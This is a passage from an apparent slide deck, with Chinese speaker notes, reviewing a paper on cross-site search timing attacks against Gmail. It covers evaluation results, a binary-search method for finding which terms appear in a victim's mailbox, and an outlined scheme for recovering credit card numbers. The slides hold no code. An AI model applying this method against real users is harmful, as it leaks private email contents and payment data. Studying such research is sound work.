  • 86. Evaluation: Compute-Inflate ● 138 active Gmail user – 90 University schoolmate – 48 Amazon M-Turk worker ● Sent a email contain single sentence – “I like [random-animal]” Dummy Target 來 evaluate compute inflate 的效果 這個實驗請了 138 個 active 的 Gmail 使用者 90 個系上同學 48 MTurk worker 實驗方式讓每個人寄一封確定只會出現一次的句子 I like 某個 animal
  • 87. Evaluation: Compute-Inflate 這是實驗結果 n 是 sample 次數 做完會使用 statistic test 來判斷
  • 88. Evaluation: Compute-Inflate 看 FN simple query 是只把 query 長度拉長而沒做 compute inflate 誤判率 >50% 比隨機亂猜還差 不知 道數據可不可信 總之他想表示只有一個 match 很容 易判斷錯誤
  • 89. Evaluation: Compute-Inflate 那用了 compute inflate 後 FN 降到 10% 以內 誤判情 況大幅減少 至於 FP 都很低 沒有 match 的 query 會被誤判成有 match 的原因主要是網路 delay 所以可以表示 network delay 影響不大
  • 90. Evaluation: Compute-Inflate 至於 FP 都很低 沒有 match 的 query 會被誤判成有 match 的原因主要是網路 delay 所以可以表示 network delay 影響不大
  • 91. Efficient Term Identification ● Which of {T1,T2,...} appears in mailbox? 接下來可以 develop 更有用的演算法 假設你有一個字的清單 T1,T2, 等等 你想知道哪些字在 信箱出現過 那要怎麼做呢?
  • 92. Efficient Term Identification ● Which of {T1,T2,...} appears in mailbox? ● Can you come up better solution? ● Naive – Query terms one-by-one – O(n) Naive 想法就一個一個字做 search 嘛 看有沒有中 但學過演算法應該可以想到更好的方法
  • 93. Efficient Term Identification ● Which of {T1,T2,...} appears in mailbox? ● Can you come up better solution? ● Naive – Query terms one-by-one – O(n) – Binary search – O(log n) 搭配 OR 做 divide conquer
  • 94. Evaluation: Efficient Term Identification ● 138 active Gmail user ● Sent a email contain single sentence – “I like [random-animal]” – 32 animal options accuracy time 同樣 138 個使用者 每個人寄一封只會在信箱出現一次 的句子 I like 某個 animal animal 有 32 種選擇 這次實驗目標是要準確找出每個人喜歡的是哪個 animal column 是使用不同 statistic test 送 25 次準確率大概是 60% 50 次有 70%
  • 95. Claimed Experiment ● Attack on Credit number – Focus on MasterCard, Visa ● Format: 4-4-4-4 ● Attack Flow 1. Find all four 4-digit number (10,000 options) 2. Find order of the 4-digit numbers ● omit wrong combination by credit card's checksum 再來是我很期待的 他們說有用自己的帳號測找信用卡 卡號的實驗 但讓我很失望 可能是因為道德因素 只在 文中講方法而沒放結果 想法是信用卡卡號有格式 4 位 4 位一組 中間用 dash 或空白隔開 那麼 divide and conquer 一次 4 位數字的 10,000 種組 合 就能找出是哪 4 個 4 位數 然後再試順序
  • 96. Conclusion ● Good discovery of how search service makes XS-Timing Attack realistic ● Typical bad paper writing style 這篇發現可以利用 search service 來大幅提升 傳統認為無法達成的 XS-Timing Attack 很有趣 但缺點是 寫作風格是屬於老師一直告誡我不要挑的爛 paper main idea 演算法明明很簡單卻寫的很複雜 實驗也是 挑一組 data 當代表就好 他偏偏要做一大 堆相同的實驗把 paper 塞滿滿的 不知道在幹嘛 而大 家有興趣的卻草草帶過 很不好 我們要引以為戒